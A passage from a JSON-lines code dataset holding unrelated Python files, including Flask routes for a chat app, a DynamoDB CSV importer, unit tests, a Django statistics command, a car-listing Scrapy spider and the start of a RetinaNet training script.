############################\n\n@app.route('/Pictochat/post/react', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\n@is_logged_in\ndef reactPost():\n if request.method == 'POST':\n User.registerActivity()\n result = Post.reactPost(request.json)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/post//count/likes', methods=['GET'])\ndef getPostLikesCountByID(post_id):\n if request.method == 'GET':\n result = Post.getPostLikesCountByID(post_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/post//count/dislikes', methods=['GET'])\ndef getPostDislikesCountByID(post_id):\n if request.method == 'GET':\n result = Post.getPostDislikesCountByID(post_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Participant Routes ######################\n\n@app.route('/Pictochat/chat/addparticipants', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\n@is_logged_in\ndef addParticipants():\n if request.method == 'POST':\n result = Chat.addParticipants(request.json)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Media Routes ######################\n\n@app.route('/Pictochat/post/insertmedia', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\n@is_logged_in\ndef insertMedia():\n if request.method == 'POST':\n result = Post.insertMedia(request.json)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/post//media', methods=['GET', 'POST'])\ndef getMediaByPostID(post_id):\n if request.method == 'GET':\n result = Post.getMediaByPostID(post_id)\n return result\n elif request.method == 'POST':\n result = Post.insertMedia(request.json)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Reply Routes ########################\n\n@app.route('/Pictochat/post/reply', methods=['GET', 'POST'])\n@cross_origin(supports_credentials=True)\n@is_logged_in\ndef reply():\n if request.method == 'POST':\n User.registerActivity()\n result = Post.reply(request.json)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/post//replies', methods=['GET'])\ndef getRepliesByPostID(post_id):\n if request.method == 'GET':\n result = Post.getRepliesByPostID(post_id)\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n###################### Dashboard Routes ########################\n\n\n@app.route('/Pictochat/dashboard/hashtags', methods=['GET'])\ndef getTrendingHashtags():\n if request.method == 'GET':\n result = Post.getTrendingHashtags()\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/dashboard/posts', methods=['GET'])\ndef getPostPerDay():\n if request.method == 'GET':\n result = Post.getPostPerDay()\n return result\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/dashboard/replies', methods=['GET'])\ndef getRepliesPerDay():\n if request.method == 'GET':\n result = postDao.getRepliesPerDay()\n return jsonify(RepliesPerDay=result)\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/dashboard/likes', methods=['GET'])\ndef getLikesPerDay():\n if request.method == 'GET':\n result = postDao.getLikesPerDay()\n return jsonify(LikesPerDay=result)\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/dashboard/dislikes', methods=['GET'])\ndef getDislikesPerDay():\n if request.method == 'GET':\n result = postDao.getDislikesPerDay()\n return jsonify(DislikesPerDay=result)\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/dashboard/post/replies', methods=['GET'])\ndef getRepliesPerPost():\n if request.method == 'GET':\n result = postDao.getRepliesPerPost()\n return jsonify(RepliesPerPost=result)\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/dashboard/post/likes', methods=['GET'])\ndef getLikesPerPost():\n if request.method == 'GET':\n result = postDao.getLikesPerPost()\n return jsonify(LikesPerPost=result)\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/dashboard/post/dislikes', methods=['GET'])\ndef getDislikesPerPost():\n if request.method == 'GET':\n result = postDao.getDislikesPerPost()\n return jsonify(DislikesPerPost=result)\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\n@app.route('/Pictochat/dashboard/user/active', methods=['GET'])\ndef getTopThreeActiveUsers():\n if request.method == 'GET':\n result = userDao.getTopThreeActiveUsers()\n return jsonify(TopThreeActiveUsers=result)\n else:\n return jsonify(Error=\"Method not allowed\"), 405\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"287878152","text":"dict1 = {\"a\": 100, \"b\": 200, \"c\": 300}\n\n# 交换key和value的位置\ndict2 = {}\nfor k, v in dict1.items():\n dict2[v] = k\nprint(dict2)\n\n\ndict3 = {v: k for k, v in dict1.items()}\nprint(dict3)","sub_path":"study01/day04/17-字典练习2.py","file_name":"17-字典练习2.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"638447998","text":"import logging\nimport asyncio\nimport time\nfrom functools import partial\nfrom mysleep import mysleep\n\nlogger = logging.getLogger(__name__)\n\n\nasync def run():\n loop = asyncio.get_event_loop()\n st = time.time()\n logger.info(\"**start**\")\n result = await asyncio.gather(\n *[\n loop.run_in_executor(None, partial(mysleep, \"x\", 1)),\n loop.run_in_executor(None, partial(mysleep, \"y\", 1)),\n loop.run_in_executor(None, partial(mysleep, \"z\", 2)),\n ]\n )\n logger.info(\"**end** %r %r\", result, time.time() - st)\n\n\nlogging.basicConfig(level=logging.DEBUG, format=\"%(asctime)s\" + logging.BASIC_FORMAT)\nasyncio.run(run(), debug=True)\n","sub_path":"daily/20190320/example_asyncio/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"29141815","text":"import boto3\r\n\r\ndef import_csv_to_dynamodb(table_name, csv_file_name, column_names, column_types):\r\n dynamodb = boto3.resource('dynamodb')\r\n table = dynamodb.Table(table_name)\r\n \r\n csv_file = open(csv_file_name, 'r')\r\n with table.batch_writer() as batch:\r\n for cur_line in csv_file:\r\n cur_line = cur_line.strip().split(',')\r\n \r\n row = {}\r\n for column_number, column_name in enumerate(column_names):\r\n row[column_name] = cur_line[column_number]\r\n\r\n print(str(row['name']))\r\n batch.put_item(\r\n Item={\r\n 'box': row['box'],\r\n 'name': row['name'],\r\n 'cardType': row['cardType'],\r\n 'cost': row['cost'],\r\n 'pickable': row['pickable'],\r\n 'setup': row['setup']\r\n }\r\n )\r\n\r\n csv_file.close()\r\n\r\n\r\ndef main():\r\n column_names = 'box name cardType cost pickable setup'.split()\r\n table_name = 'DominionCards'\r\n csv_file_name = 'menagerie.csv'\r\n column_types = [str, str, int, bool, str, str]\r\n import_csv_to_dynamodb(table_name, csv_file_name, column_names, column_types)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"46082507","text":"from errbit.client import Client\nfrom mocker import MockerTestCase\nimport os\nimport pkg_resources\nimport sys\n\n\nERRBIT_VERSION = pkg_resources.require('errbit')[0].version\nREQUESTS_VERSION = pkg_resources.require('requests')[0].version\n\ntry:\n raise AttributeError(\"Foo instance has no attribute 'bar'\")\nexcept:\n EXC_INFO = sys.exc_info()\n\n\nclass TestClient(MockerTestCase):\n\n def tearDown(self):\n for key in filter(lambda key: key.startswith('ERRBIT_'),\n os.environ.keys()):\n del os.environ[key]\n\n def test_set_api_key_with_environment_variables(self):\n os.environ['ERRBIT_API_KEY'] = 'abcd1234'\n client = Client()\n self.assertEquals('abcd1234', client.get_api_key())\n\n def test_configure_errbit_url_with_environment_variable(self):\n os.environ['ERRBIT_URL'] = 'http://errbit.local/api'\n\n client = Client()\n self.assertEquals('http://errbit.local/api', client.get_errbit_url())\n\n def test_posting_exception(self):\n os.environ['ERRBIT_API_KEY'] = 'abcd1234'\n os.environ['ERRBIT_URL'] = 'http://errbit.local/api'\n request_data = {'url': 'http://foo/bar'}\n env_data = {'project-root': os.getcwd()}\n client = Client()\n\n xmlgenerator = self.mocker.replace('errbit.xmlgenerator.generate_xml')\n self.expect(xmlgenerator('abcd1234', client.get_notifier(),\n EXC_INFO, request=request_data, environment=env_data)\n ).result('')\n\n req_class = self.mocker.replace('errbit.request.ThreadedRequest')\n req = self.mocker.mock()\n self.expect(req_class('http://errbit.local/api', '')).result(req)\n self.expect(req.start())\n\n self.mocker.replay()\n client.post(EXC_INFO, request=request_data)\n","sub_path":"errbit/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"583743514","text":"\"\"\"\nThis module contains snippets of Python 2 code (invalid Python 3) and\ntests for whether they can be passed to ``futurize`` and immediately\nrun under both Python 2 again and Python 3.\n\"\"\"\n\nfrom __future__ import print_function, absolute_import\n\nimport unittest\nimport pprint\nfrom subprocess import Popen, PIPE\nimport tempfile\nimport os\n\nfrom future.tests.base import CodeHandler\n\n\nclass TestFuturizeSimple(CodeHandler, unittest.TestCase):\n def setUp(self):\n self.interpreters = ['python']\n self.tempdir = tempfile.mkdtemp() + os.path.sep\n self.env = {'PYTHONPATH': os.getcwd()}\n\n def test_xrange(self):\n code = '''\n for i in xrange(10):\n pass\n '''\n self.simple_convert_and_run(code)\n\n def test_range_slice(self):\n \"\"\"\n This should run on Py2 without a MemoryError\n \"\"\"\n code = '''\n for i in range(10**15)[:10]:\n pass\n '''\n self.simple_convert_and_run(code)\n\n def test_super(self):\n \"\"\"\n Ensure the old method of calling super() still works.\n \"\"\"\n code = '''\n class VerboseList(list):\n def append(self, item):\n print 'Adding an item'\n super(VerboseList, self).append(item)\n '''\n self.simple_convert_and_run(code)\n\n def test_apply(self):\n code = '''\n def addup(*x):\n return sum(x)\n \n assert apply(addup, (10,20)) == 30\n '''\n self.simple_convert_and_run(code)\n \n def test_renamed_modules(self):\n code = '''\n import ConfigParser\n import copy_reg\n import cPickle\n import cStringIO\n '''\n self.simple_convert_and_run(code)\n \n @unittest.skip('not implemented yet')\n def test_download_pypi_package_and_test(self, package_name='future'):\n URL = 'http://pypi.python.org/pypi/{}/json'\n \n from future import standard_library\n import requests\n r = requests.get(URL.format(package_name))\n pprint.pprint(r.json())\n \n download_url = r.json()['urls'][0]['url']\n filename = r.json()['urls'][0]['filename']\n # r2 = requests.get(download_url)\n # with open('/tmp/' + filename, 'w') as tarball:\n # tarball.write(r2.content)\n\n # Ideally, we'd be able to use code like this:\n # import urllib.request\n # \n # r = urllib.request.urlopen(URL.format(package_name))\n # pprint.pprint(r.read()) \n\n def test_raw_input(self):\n \"\"\"\n Passes in a string to the waiting input() after futurize\n conversion.\n\n The code is the first snippet from these docs:\n http://docs.python.org/2/library/2to3.html\n \"\"\"\n py2code = '''\n from future.builtins import *\n def greet(name):\n print \"Hello, {0}!\".format(name)\n print \"What's your name?\"\n name = raw_input()\n greet(name)\n '''\n self._write_test_script(py2code)\n output = self._futurize_test_script()\n\n for interpreter in self.interpreters:\n p1 = Popen([interpreter, self.tempdir + 'mytestscript.py'],\n stdout=PIPE, stdin=PIPE, stderr=PIPE, env=self.env)\n (stdout, stderr) = p1.communicate(b'Ed')\n # print(stdout)\n # print(stderr)\n self.assertEqual(stdout, b\"What's your name?\\nHello, Ed!\\n\")\n\n def test_u_prefixes_are_not_stripped(self):\n \"\"\"\n Tests to ensure that the u'' prefixes on unicode strings are not\n removed by the futurize script. Removing the prefixes on Py3.3+ is\n unnecessary and loses some information -- namely, that the strings have\n explicitly been marked as unicode, rather than just the futurize\n script's guess (perhaps incorrect) that they should be unicode.\n \"\"\"\n code = '''\n s = u'Hello'\n '''\n newcode = self.simple_convert(code)\n self.assertTrue(\"s = u'Hello'\" in newcode)\n\n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"future/tests/test_futurize.py","file_name":"test_futurize.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"357023627","text":"from sklearn.gaussian_process import GaussianProcessRegressor, kernels\nfrom skopt.space import Categorical, Integer, Real\n\nfrom src.hyper_opt.run import run_hyper_opt\n\nspace = (\n Categorical([\"Matern\", \"RBF\", \"RationalQuadratic\", \"ExpSineSquared\"], name=\"kernel\"),\n Integer(0, 5, name=\"n_restarts_optimizer\"),\n Real(1e-12, 1e-8, prior=\"log-uniform\", name=\"alpha\"),\n)\n\n\ndef build_model_and_run(params, X_train, y_train, X_test):\n kernel = getattr(kernels, params.pop(\"kernel\"))()\n model = GaussianProcessRegressor(kernel=kernel, **params, random_state=0)\n model.fit(X_train, y_train)\n y_pred, y_std = model.predict(X_test, return_std=True)\n y_std[y_std <= 0] = 1e-6\n return y_pred, y_std\n\n\nrun_hyper_opt(\n build_model_and_run, space=space, log_dir_model=\"gp/hyper_opt\", labels=\"resistivity\"\n)\n","sub_path":"src/gp/hyper_opt.py","file_name":"hyper_opt.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"73840120","text":"\n#coding:utf-8\n'''\nCreated on 2017年4月12日\n\n@author: lch\n'''\nimport logging\nfrom wafuli.models import *\nimport time as ttime\nfrom django.core.management.base import BaseCommand\nfrom django.db.models import Sum,F\nfrom account.models import MyUser, Channel\nfrom django.conf import settings\nfrom decimal import Decimal\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import F\nfrom project_admin.models import ProjectStatis, DayStatis, Project,\\\n ProjectInvestData, AccountBill, Account, DayAccountStatic\nimport logging\nimport time\nlogger = logging.getLogger(\"wafuli\")\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n logger.info(\"******Project_statis is beginning*********\")\n begin_time = time.time()\n today = datetime.date.today()\n from django.db import connection, transaction\n cursor = connection.cursor()\n cursor.execute(\"select a.project_id, a.source, sum(a.settle_amount) as sumofsettle, \\\n sum(a.return_amount) as sumofret from project_admin_projectinvestdata a \\\n group by a.project_id, a.source\")\n # 数据修改操作——提交要求\n# cursor.execute(\"select b.is_channel, a.audit_state, \\\n# sum(invest_amount) as sum, count(*) as count from wafuli_userevent a join account_myuser b\\\n# on a.user_id=b.id group by a.audit_state, b.is_channel\")\n# transaction.commit_unless_managed()\n \n # 数据检索操作,不需要提交\n# cursor.execute(\"SELECT foo FROM bar WHERE baz = %s\", [self.baz])\n row = cursor.fetchall()\n project_dic = {}\n for item in row:\n id = item[0]\n source = item[1]\n consume = item[2]\n ret = item[3]\n attr = {}\n if project_dic.has_key(id):\n attr = project_dic[id]\n else:\n project_dic[id] = attr\n if source == 'site':\n attr['site_consume'] = consume\n attr['site_return'] = ret\n elif source == 'channel':\n attr['channel_consume'] = consume\n attr['channel_return'] = ret\n# print project_dic \n for id, kwarg in project_dic.items():\n obj,created = ProjectStatis.objects.update_or_create(project_id=id, defaults=kwarg)\n Project.objects.filter(id=id).update(consume=obj.consume())\n# return row\n update_fields = {}\n update_fields['start_num'] = Project.objects.filter(state='start').count()\n update_fields['finish_num'] = Project.objects.filter(state='finish').count()\n update_fields['invest_count'] = ProjectInvestData.objects.filter(invest_time=today).count()\n statdic = ProjectInvestData.objects.filter(invest_time=today).aggregate(invest_sum=Sum('invest_amount'),\n consume_sum=Sum('settle_amount'))\n update_fields['ret_count'] = ProjectInvestData.objects.filter(invest_time=today, state='0').count()\n statdic_pass = ProjectInvestData.objects.filter(invest_time=today, state='0').aggregate(\n ret_invest_sum=Sum('invest_amount'), ret_sum=Sum('return_amount'))\n update_fields.update(statdic)\n update_fields.update(statdic_pass)\n obj, created = DayStatis.objects.update_or_create(date=today, defaults=update_fields)\n# cursor.execute(\"select a.project_id, a.source, sum(a.settle_amount) as sumofsettle, \\\n# sum(a.return_amount) as sumofret from project_admin_projectinvestdata a \\\n# group by a.project_id, a.source\")\n update_fields = {}\n income = AccountBill.objects.filter(time__gte=today, type='income').aggregate(income=Sum('amount'))\n expenditure = AccountBill.objects.filter(time__gte=today, type='expend').aggregate(expenditure=Sum('amount'))\n balance = Account.objects.aggregate(balance=Sum('balance'))\n update_fields.update(income)\n update_fields.update(expenditure)\n update_fields.update(balance)\n obj, created = DayAccountStatic.objects.update_or_create(date=today, defaults=update_fields)\n \n end_time = time.time()\n logger.info(\"******Project_statis is finished, time:%s*********\",end_time-begin_time)","sub_path":"wafuli_admin/management/commands/project_statis.py","file_name":"project_statis.py","file_ext":"py","file_size_in_byte":4338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"407703325","text":"print(\"\"\"\n7. Gerar e imprimir uma matriz de tamanho 10 x 10, onde seus elementos são da forma:\nA[i][j] = 2i + 7j - 2 se i < j;\nA[i][j] = 3i² – 1 se i = j;\nA[i][j] = 4i³ – 5j² + 1 se i > j.\n\"\"\")\n\nlinhas = list()\nmatriz = list()\n\nfor i in range(10):\n for j in range(10):\n if i < j:\n linhas.append(((2*i) + (7*j)) - 2)\n\n elif i == j:\n linhas.append(((3 * i) ** 2) - 1)\n\n elif i > j:\n linhas.append(((4 * i) ** 3) - ((5 * j) ** 2))\n\n else:\n pass\n matriz.append(linhas)\n linhas = list()\n\nmatriz_str = matriz.copy()\n\nfor linha in matriz_str:\n for coluna in range(len(linha)):\n linha[coluna] = str(linha[coluna]).center(5)\n print(*linha)\n\nlista = [int(input(f'Insira o {num + 1}º número: ')) for num in range(int(input('Range: ')))]\nprint(f'Maior valor: {max(lista)}, Posição: {lista.index(max(lista))}', f'\\nMenor valor: {min(lista)}, Posição: {lista.index(min(lista))}')\n","sub_path":"Seção_07/parte_2/Exercício_07.py","file_name":"Exercício_07.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"139614759","text":"import copy\nimport hashlib\nimport json\nimport time\n\nimport re\n\nfrom ..items import che58_newcar\nimport scrapy\nfrom scrapy.conf import settings\n\nwebsite = 'che58_newcar'\n\n\n# 先循环城市 然后在循环车\nclass CarSpider(scrapy.Spider):\n name = website\n start_urls = [\n \"https://product.58che.com/price_list/brand_1_1.shtml\"]\n headers = {\n 'Connection': 'keep-alive',\n 'Pragma': 'no-cache',\n 'Cache-Control': 'no-cache',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36',\n 'Sec-Fetch-Dest': 'document',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n }\n custom_settings = {\n 'DOWNLOAD_DELAY': 0.5,\n 'CONCURRENT_REQUESTS': 15,\n \"COOKIES_ENABLED\": False\n }\n\n def __init__(self, **kwargs):\n super(CarSpider, self).__init__(**kwargs)\n settings.set('WEBSITE', website, priority='cmdline')\n settings.set('MONGODB_COLLECTION', website, priority='cmdline')\n settings.set(\"MONGODB_DB\", \"newcar\", priority=\"cmdline\")\n self.counts = 0\n\n def parse(self, response):\n brand_list = response.xpath(\"//a[@class='first']/@title\").extract()\n brand_id_list = response.xpath(\"//a[@class='first']/@href\").extract()\n brand_dict = dict(zip(brand_list, brand_id_list))\n for i in brand_dict.items():\n brand_id = re.findall(\"_(\\d*)_\", i[1])[0]\n url = \"https://product.58che.com/index.php?c=Ajax_AjaxFirmCarLine\"\n yield scrapy.FormRequest(url=url, formdata={\"brandId\": brand_id},\n meta={\"brand_name\": i[0], \"brand_id\": brand_id}, callback=self.parse_fnf,\n headers=self.headers,\n dont_filter=True)\n\n def parse_fnf(self, response):\n data = json.loads(response.text)\n for i in data['firmCarLineArr']:\n for j in data['firmCarLineArr'][i]:\n for z in data['firmCarLineArr'][i][j]:\n factoty_name = data['firmCarLineArr'][i][j][\"name\"]\n factoty_id = data['firmCarLineArr'][i][j][\"firmId\"]\n if isinstance(data['firmCarLineArr'][i][j][\"lineInfo\"], dict):\n for x in data['firmCarLineArr'][i][j][\"lineInfo\"].items():\n serier_name = x[1][\"name\"]\n factoty_name = factoty_name\n factoty_id = factoty_id\n serier_id = x[1][\"lineId\"]\n url = \"https://product.58che.com\" + x[1][\"lineUrl\"]\n url_list = []\n id = url.split(\"/\")[-2]\n url_list.append({\"url\": \"https://product.58che.com/price_list/{}/page_4.shtml\".format(id),\n \"stat\": \"停售\"}) # 4\n url_list.append({\"url\": \"https://product.58che.com/price_list/{}/page_2.shtml\".format(id),\n \"stat\": \"停产在售\"}) # 2\n url_list.append({\"url\": \"https://product.58che.com/price_list/{}/page_3.shtml\".format(id),\n \"stat\": \"即将上市\"})\n url_list.append({\"url\": \"https://product.58che.com/price_list/{}/page_1.shtml\".format(id),\n \"stat\": \"在售\"})\n for c in url_list:\n item = {}\n item[\"serier_name\"] = serier_name\n item[\"factoty_name\"] = factoty_name\n item[\"factoty_id\"] = factoty_id\n item[\"serier_id\"] = serier_id\n item[\"stat\"] = c[\"stat\"]\n item[\"used_url\"] = c[\"url\"]\n response.meta.update(item)\n meta = copy.deepcopy(response.meta)\n print(meta)\n\n yield scrapy.Request(url=c[\"url\"], meta=meta, headers=self.headers,\n callback=self.parse_family,dont_filter=True)\n else:\n for x in data['firmCarLineArr'][i][j][\"lineInfo\"]:\n serier_name = x[\"name\"]\n factoty_name = factoty_name\n factoty_id = factoty_id\n serier_id = x[\"lineId\"]\n url = \"https://product.58che.com/\" + x[\"lineUrl\"]\n url_list = []\n id = url.split(\"/\")[-2]\n url_list.append({\"url\": \"https://product.58che.com/price_list/{}/page_4.shtml\".format(id),\n \"stat\": \"停售\"}) # 4\n url_list.append({\"url\": \"https://product.58che.com/price_list/{}/page_2.shtml\".format(id),\n \"stat\": \"停产在售\"}) # 2\n url_list.append({\"url\": \"https://product.58che.com/price_list/{}/page_3.shtml\".format(id),\n \"stat\": \"即将上市\"})\n url_list.append({\"url\": \"https://product.58che.com/price_list/{}/page_1.shtml\".format(id),\n \"stat\": \"在售\"})\n for c in url_list:\n item = {}\n item[\"serier_name\"] = serier_name\n item[\"factoty_name\"] = factoty_name\n item[\"factoty_id\"] = factoty_id\n item[\"serier_id\"] = serier_id\n item[\"stat\"] = c[\"stat\"]\n item[\"used_url\"] = c[\"url\"]\n response.meta.update(item)\n meta = copy.deepcopy(response.meta)\n print(meta)\n yield scrapy.Request(url=c[\"url\"], meta=meta, headers=self.headers,\n callback=self.parse_family,dont_filter=True)\n\n def parse_family(self, response):\n url_list = response.xpath(\"//td[@class='marg']/a[1]/@href\").extract()\n for url in url_list:\n url = \"https:\" + url.replace(\"config\", \"param\")\n yield scrapy.Request(url=url, meta=response.meta, headers=self.headers,\n callback=self.parse_family2,dont_filter=True)\n\n def md5_encryption(self, data):\n # 获取sign\n m = hashlib.md5()\n url_md5 = (data).encode(encoding='utf-8')\n m.update(url_md5)\n url_md5 = m.hexdigest()\n return url_md5\n def parse_family2(self, response):\n canshu_list = response.xpath(\"//div[@id='peizhi']//td\")\n canshu_dict = {}\n for i in canshu_list:\n canshu_key = i.xpath(\".//span[1]/text()\").extract_first()\n if canshu_key == None:\n canshu_key = i.xpath(\".//a/text()\").extract_first()\n canshu_value = i.xpath(\".//span[2]/text()\").extract_first()\n if canshu_key != None:\n canshu_dict.update({canshu_key: canshu_value})\n item = che58_newcar()\n item[\"grab_time\"] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n item[\"url\"] = response.url\n item[\"brand_name\"] = response.meta[\"brand_name\"]\n item[\"brand_id\"] = response.meta[\"brand_id\"]\n item[\"serier_id\"] = response.meta[\"serier_id\"]\n item[\"serier_name\"] = response.meta[\"serier_name\"]\n item[\"factoty_name\"] = response.meta[\"factoty_name\"]\n item[\"factoty_id\"] = response.meta[\"factoty_id\"]\n car_stat = response.meta[\"used_url\"].split(\"/\")[-1]\n if '1' in car_stat:\n item[\"stat\"] = \"在售\"\n elif '2' in car_stat:\n item[\"stat\"] = \"停产在售\"\n elif '3' in car_stat:\n item[\"stat\"] = \"即将上市\"\n elif '4' in car_stat:\n item[\"stat\"] = \"停售\"\n item[\"model_id\"] = re.findall(\"/(\\d*)/param\", response.url)[0]\n item[\"model_name\"] = response.xpath(\"//h3/a/text()\").extract_first()\n item[\"short_desc\"] = response.xpath(\"//h3/a/text()\").extract_first()\n item[\"Dealer_price\"] = response.xpath(\"//span[contains(text(),'经销商报价:')]/../span[2]/text()\").extract_first()\n item[\"guide_price\"] = response.xpath(\"//span[contains(text(),'厂商指导价')]/../span[2]/text()\").extract_first()\n item[\"speed\"] = response.xpath(\"//span[contains(text(),'变速箱:')]/../span[2]/text()\").extract_first()\n item[\"output\"] = response.xpath(\"//span[contains(text(),'排量')]/../span[2]/text()\").extract_first()\n item[\"drive_type\"] = response.xpath(\"//span[contains(text(),'驱动方式')]/../span[2]/text()\").extract_first()\n item[\"doors\"] = response.xpath(\"//span[contains(text(),'车门数')]/../span[2]/text()\").extract_first()\n item[\"seat\"] = response.xpath(\"//span[contains(text(),'座位')]/../span[2]/text()\").extract_first()\n item[\"air_inlet\"] = response.xpath(\"//span[contains(text(),'进气')]/../span[2]/text()\").extract_first()\n item[\"fuel_type\"] = response.xpath(\"//span[contains(text(),'燃油类型')]/../span[2]/text()\").extract_first()\n item[\"body\"] = response.xpath(\"//span[contains(text(),'车身结构')]/../span[2]/text()\").extract_first()\n item[\"makeyear\"] = response.xpath(\"//span[contains(text(),'款型')]/../span[2]/text()\").extract_first()\n item[\"environment\"] = json.dumps(canshu_dict, ensure_ascii=False)\n item[\"statusplus\"] = response.url + self.md5_encryption(str(canshu_dict)) + str(3)\n yield item\n","sub_path":"old_guazi/guazi/guazi/build/lib/guazi/spiders/che58_newcar.py","file_name":"che58_newcar.py","file_ext":"py","file_size_in_byte":10221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"124884604","text":"__author__ = 'Mart'\n\"\"\" Common Functions for the data \"\"\"\nimport BeautifulSoup\nfrom database.management import friendsGetFirstDegree\n\n#Method for removing the newlines\naha = \"\"\"=\n\"\"\"\nenter = \"\"\"\n\"\"\"\n\ndef loadDocument(name):\n with open(name,'r') as m:\n data = m.read().replace('\\n\\r','')\n return fixData(data)\n\ndef fixData(data):\n \"\"\"Fix the data, that has been corrupted by the saving method\"\"\"\n data = data.replace(\"'3D\\\"_5q6s' _8o=\\\"_8o\\\" _8t=\\\"_8t\\\" lfloat=\\\"lfloat\\\" _oh='e\\\"'\",'class=\"_5q6s _8o _8t lfloat _ohe\"')\n data = data.replace(aha, '')\n data = data.replace('3D\"','\"')\n return data\n\ndef rewriteDocument(name, newname):\n \"\"\"Rewrite the document in format used in the system\"\"\"\n with open(newname,'w+') as m:\n m.write(fixData(loadDocument(name)))\n\ndef hovercardGetFBID(data):\n \"\"\"Extract the userID from a hovercard\"\"\"\n data = str(data)\n data = data.replace('=3D','=')\n data = data.replace('\"\"','\"')\n a = data.split('&')[0]\n start = a.find('id=')\n return a[start+len('id='):]\n\ndef generateSoup(data):\n return BeautifulSoup.BeautifulSoup(data)\n\ndef findAllHovercard(soup):\n \"\"\"Find all links with a hovercard and data\"\"\"\n return soup.findAll(\"a\", { \"data-hovercard\" : True, 'data-gt':True})\n\ndef getPeopleOnPage(soup):\n \"\"\"Get all the 'people on the page, this function may give too much data \"\"\"\n out = []\n people = findAllHovercard(soup)\n for person in people:\n if not person.contents == []:\n #Check for empty lists\n temp = str(person.contents[0])\n if not temp[0] is '<':\n #Generate the tuple and split the url so we can't be tracked\n out.append((str(person.contents[0]),person.get('href').split('?')[0], hovercardGetFBID(person.get(\"data-hovercard\"))))\n return out\n\ndef getPageSubject(data):\n start = data.find('Subject: ')\n end = data.find(enter, start)\n return data[start + len('Subject: '):end]\n\ndef generateFriendsHTML():\n \"\"\"\n Generate a page with links to all the first grade friends\n :return: nothing, the page will be written to disk\n \"\"\"\n friends = friendsGetFirstDegree()\n with open('../output/html/friendshtml.html','w+') as m:\n m.write('')\n for friend in friends:\n m.write('

Friend

')\n m.write('')\n\n#Testing:\n\n#print getPageSubject(loadDocument(\"../data/friends/\"))\n\n#generateFriendsHTML()\n\n","sub_path":"scraping/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"297541783","text":"import os\nfrom dotenv import load_dotenv\nimport json\nimport shutil\nfrom loading_data import queryDB, get_classmap\nfrom loading_data import download_annotations\nimport pandas as pd\nfrom keras_retinanet import models\nfrom keras_retinanet.utils.model import freeze as freeze_model\nfrom keras.utils import multi_gpu_model\nfrom keras_retinanet import losses\nfrom keras_retinanet.preprocessing.csv_generator import CSVGenerator\nfrom keras_retinanet.models.retinanet import retinanet_bbox\nimport keras\nfrom model_scoring import f1_evaluation\nfrom keras_retinanet.utils.eval import evaluate\nfrom keras_retinanet.models import convert_model\nfrom keras_retinanet.models import load_model\n\nconfig_path = \"../config.json\"\nload_dotenv(dotenv_path=\"../.env\")\nwith open(config_path) as config_buffer: \n config = json.loads(config_buffer.read())['ml']\n\ntrain_annot_file = 